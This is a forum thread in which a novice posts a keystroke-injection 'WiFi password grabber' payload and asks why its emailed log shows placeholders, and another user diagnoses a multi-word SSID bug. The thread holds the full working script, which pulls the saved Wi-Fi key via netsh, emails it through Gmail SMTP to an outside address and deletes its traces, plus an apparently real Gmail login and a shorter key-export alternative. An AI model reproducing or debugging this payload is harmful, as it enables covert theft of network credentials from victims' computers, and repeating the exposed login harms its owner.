rainbowtornado Posted January 29, 2022 Share Posted January 29, 2022 tryna run wifi pw grabber email gets sent to designated address but heres whats in attached txt file w email: SSID: get (first word of network name is 'get' so makes sense) Network Type: %NETTYPE% Authentication: %AUTH% Password: %KEY% ken anyone help me here it took me hours to succesfully edit script to get email sent at all total newb here if n e one ken help me figure out why its not finding values of these fields included in email doc im obliged Link to comment Share on other sites More sharing options...
dark_pyrro Posted January 29, 2022 Share Posted January 29, 2022 To be able to troubleshoot, it would be good to know what the actual payload looks like. Link to comment Share on other sites More sharing options...
rainbowtornado Posted January 29, 2022 Author Share Posted January 29, 2022 C:\Users\computer>cd "%USERPROFILE%\Desktop" C:\Users\computer\Desktop>for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "B"') do set SSID=%A C:\Users\computer\Desktop>set SSID=get C:\Users\computer\Desktop>netsh wlan show profiles %SSID% | findstr "Network type" | findstr /v "broadcast" | findstr /v "Radio">Temp.txt C:\Users\computer\Desktop>for /f "tokens=3 delims=: " %A in ('findstr "Network type" Temp.txt') do set NETTYPE=%A C:\Users\computer\Desktop>netsh wlan show profiles %SSID% | findstr "Authentication">Temp.txt C:\Users\computer\Desktop>for /f "tokens=2 delims=: " %A in ('findstr "Authentication" Temp.txt') do set AUTH=%A C:\Users\computer\Desktop>netsh wlan show profiles %SSID% key=clear | findstr "Key Content">Temp.txt C:\Users\computer\Desktop>for /f "tokens=3 delims=: " %A in ('findstr "Key Content" Temp.txt') do set KEY=%A C:\Users\computer\Desktop>del Temp.txt C:\Users\computer\Desktop>echo SSID: %SSID%>>Log.txt & echo Network type: %NETTYPE%>>Log.txt & echo Authentication: %AUTH%>>Log.txt & echo Password: %KEY%>>Log.txt C:\Users\computer\Desktop>powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Try the new cross-platform PowerShell https://aka.ms/pscore6 PS C:\Users\computer\Desktop> $SMTPServer = 'smtp.gmail.com' PS C:\Users\computer\Desktop> $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) PS C:\Users\computer\Desktop> $SMTPInfo.EnableSsl = $true PS C:\Users\computer\Desktop> $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('my email@gmail.com', 'mypassword'); PS C:\Users\computer\Desktop> $ReportEmail = New-Object System.Net.Mail.MailMessage PS C:\Users\computer\Desktop> $ReportEmail.From = 'myemail@gmail.com' PS C:\Users\computer\Desktop> $ReportEmail.To.Add('myemailsentto@gmail.com') PS C:\Users\computer\Desktop> $ReportEmail.Subject = 'WiFi' PS C:\Users\computer\Desktop> $ReportEmail.Body = 'The log is attached!' PS C:\Users\computer\Desktop> $ReportEmail.Attachments.Add('Log.txt') PS C:\Users\computer\Desktop> $SMTPInfo.Send($ReportEmail) PS C:\Users\computer\Desktop> exit Link to comment Share on other sites More sharing options...
rainbowtornado Posted January 29, 2022 Author Share Posted January 29, 2022 using payload wifi password grabber payload off github any help feedback appreciated DELAY 2000 WINDOWS d REM --> Open cmd WINDOWS r DELAY 500 STRING cmd ENTER DELAY 1000 REM --> Change directory (you can change this to something else to make less visible) STRING cd "%USERPROFILE%\Desktop" ENTER REM --> Get SSID STRING for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "B"') do set SSID=%A ENTER REM --> Get network type STRING netsh wlan show profiles %SSID% | findstr "Network type" | findstr /v "broadcast" | findstr /v "Radio">Temp.txt ENTER STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" Temp.txt') do set NETTYPE=%A ENTER REM --> Get authentication STRING netsh wlan show profiles %SSID% | findstr "Authentication">Temp.txt ENTER STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" Temp.txt') do set AUTH=%A ENTER REM --> Get key STRING netsh wlan show profiles %SSID% key=clear | findstr "Key Content">Temp.txt ENTER STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" Temp.txt') do set KEY=%A ENTER REM --> Delete Temp.txt STRING del Temp.txt ENTER REM --> Create Log.txt STRING echo SSID: %SSID%>>Log.txt & echo Network type: %NETTYPE%>>Log.txt & echo Authentication: %AUTH%>>Log.txt & echo Password: %KEY%>>Log.txt ENTER REM --> Mail Log.txt STRING powershell ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('earlreallong99@gmail.com', 'Tempy22Lily'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'earlreallong99@gmail.com' ENTER STRING $ReportEmail.To.Add('reallong99@gmail.com') ENTER STRING $ReportEmail.Subject = 'WiFi' ENTER STRING $ReportEmail.Body = 'The log is attached!' ENTER STRING $ReportEmail.Attachments.Add('Log.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER STRING exit ENTER REM --> Delete Log.txt and exit STRING del Log.txt & exit ENTER Link to comment Share on other sites More sharing options...
dark_pyrro Posted January 29, 2022 Share Posted January 29, 2022 I can't see why that shouldn't work. You say this though; "get (first word of network"..... is "get" the SSID or are there more words/chars in the SSID? If the SSID is not present, then the variables will be set as you get them in your result file, meaning; NETTYPE will be %NETTYPE% in the result file if there is no SSID that you can obtain the NETTYPE from. It's also a rather cumbersome way of doing it, why not just use: netsh wlan export profile key=clear Link to comment Share on other sites More sharing options...
rainbowtornado Posted January 29, 2022 Author Share Posted January 29, 2022 full ssid is 'get your own', only word 'get' appears in email tho Link to comment Share on other sites More sharing options...
dark_pyrro Posted January 29, 2022 Share Posted January 29, 2022 Exactly! My guess is that there is a flaw/bug in that payload making it only "compatible" with SSIDs that is "one word only"; SSID = "oneword" works, SSID = "two words" does not. In your case; SSID = "getyourown" is OK, whereas SSID = "get your own" isn't working since the payload script seems to just grab "get" as the SSID name and when the script continues to execute it can't find any SSID named "get" hence not getting any information to store in the coming variables which makes (for example) NETWORK to be %NETWORK% and that is what you see in the result file that is emailed to you. Link to comment Share on other sites More sharing options...
rainbowtornado Posted January 30, 2022 Author Share Posted January 30, 2022 oh wow thank you vvererrrrry much mi amigo Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.